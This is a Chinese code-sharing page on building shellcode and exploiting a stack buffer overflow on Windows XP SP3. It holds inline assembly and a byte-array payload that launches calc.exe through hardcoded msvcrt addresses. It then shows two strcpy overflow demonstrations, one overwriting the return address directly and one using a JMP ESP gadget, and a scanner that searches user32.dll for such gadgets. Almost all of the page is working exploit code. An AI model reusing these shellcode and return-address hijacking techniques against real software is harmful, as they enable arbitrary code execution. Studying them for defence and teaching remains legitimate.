首页 > 代码库 > Shellcode的简单取得
Shellcode的简单取得
以弹出计算器为例
.c
system("calc.exe"); exit(0);
.asm
__asm { xor eax, eax push eax mov byte ptr [esp], ‘l‘ mov byte ptr [esp+1], ‘l‘ push ‘d.tr‘ push ‘cvsm‘ // push msvcrt.dll 0 0, 12 bytes mov eax, esp push eax // string "msvcrt.dll" address mov eax, 7c801d7bh//LoadLibraryA msvcrt.dll call eax xor eax, eax push eax push ‘exe.‘ push ‘clac‘ // push calc.exe 0 0 0 0, 12 bytes mov eax, esp push eax // string "calc.exe" address mov eax,77BF93C7h//system call eax xor eax, eax push eax mov eax,77C09E7Eh//exit(0) call eax }
ShellCode
unsigned char uc[] = "\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E" "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0" "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50" "\xB8\xC7\x93\xBF\x77\xFF\xD0\x33\xC0\x50\xB8\x7E\x9E\xC0\x77\xFF" "\xD0"; typedef void (*FUNC)(); ((FUNC)&uc)();
Stack Overflow 1
void func1(char* s) { char buf[10]; strcpy(buf, s); } char ch[] = "0123456789123456";//integer multiple(4) DWORD* pEIP = (DWORD*)&ch[12];//retn address, +12 realease,+16 debug *pEIP = (DWORD)uc;//retn address point to ShellCode func1(ch);
ShellCode Overflow 2
HMODULE hMod = LoadLibrary("user32.dll"); unsigned char uc[] = "1234567890123456\x53\x93\xD2\x77\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E" "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0" "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50" "\xB8\xC7\x93\xBF\x77\xFF\xD0\x33\xC0\x50\xB8\x7E\x9E\xC0\x77\xFF" "\xD0"; func1((char*)uc);
XP SP3 相关地址取得
HMODULE hMod = LoadLibrary("msvcrt.dll"); if (hMod) { printf("%p\r\n", GetProcAddress(hMod, "system"));//77BF93C7 printf("%p\r\n", GetProcAddress(hMod, "exit"));//77C09E7E FreeLibrary(hMod); } HMODULE hMod = LoadLibrary("user32.dll"); if (hMod) { PBYTE pTravel = (PBYTE)hMod; BOOL bLoop = TRUE; for (DWORD i = 0; bLoop; i++) { //FF E0 JMP EAX //FF E1 JMP ECX //FF E2 JMP EDX //FF E3 JMP EBX //FF E4 JMP ESP //FF E5 JMP EBP //FF E6 JMP ESI //FF E7 JMP EDI //FF D0 CALL EAX //FF D1 CALL ECX //FF D2 CALL EDX //FF D3 CALL EBX //FF D4 CALL ESP //FF D5 CALL EBP //FF D6 CALL ESI //FF D7 CALL EDI try { if(pTravel[i] == 0xFF && pTravel[i+1] == 0xE4) { printf("%p\r\n", pTravel + i);//77D29353 break; } } catch(...) { bLoop = FALSE; } } FreeLibrary(hMod); }
Shellcode的简单取得
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。